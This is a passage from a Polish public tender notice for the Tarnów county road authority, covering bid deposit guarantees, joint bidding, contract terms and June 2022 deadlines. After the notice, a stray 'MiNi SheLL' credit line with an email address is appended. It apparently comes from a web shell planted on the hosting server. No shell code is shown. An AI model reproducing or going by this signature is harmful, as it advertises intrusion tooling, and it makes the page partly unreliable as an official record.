Zamawiającego nie później niż przed upływem <br/>terminu składania ofert. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń <br/>międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 3 pkt 2)–4) <br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej <br/>opatrzonej kwalifikowanym podpisem elektronicznym przez gwaranta. <br/> Wadium wniesione w formie gwarancji i poręczeń musi spełniać co najmniej poniższe warunki: <br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez <br/>Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp; <br/>2) z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta; <br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>4) musi obejmować cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania <br/>ofert; <br/>5) nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału <br/>dokumentu gwarancyjnego do Gwaranta; <br/>6) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego <br/>postępowania; <br/>7) Beneficjentem poręczenia lub gwarancji jest: Powiat Tarnowski adres siedziby: 33-100 Tarnów, <br/>ul. Narutowicza 38, NIP: 993 066 09 13, działający przez jednostkę budżetową: Powiatowy Zarząd <br/>Dróg w Tarnowie z/s w Zgłobicach ul. Zgłobicka 8, 33-113 Zgłobice. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do <br/>oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale VIII pkt. 1 SWZ, składa każdy z wykonawców. Oświadczenia te <br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim <br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z paragrafem 15 załącznika nr 10 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com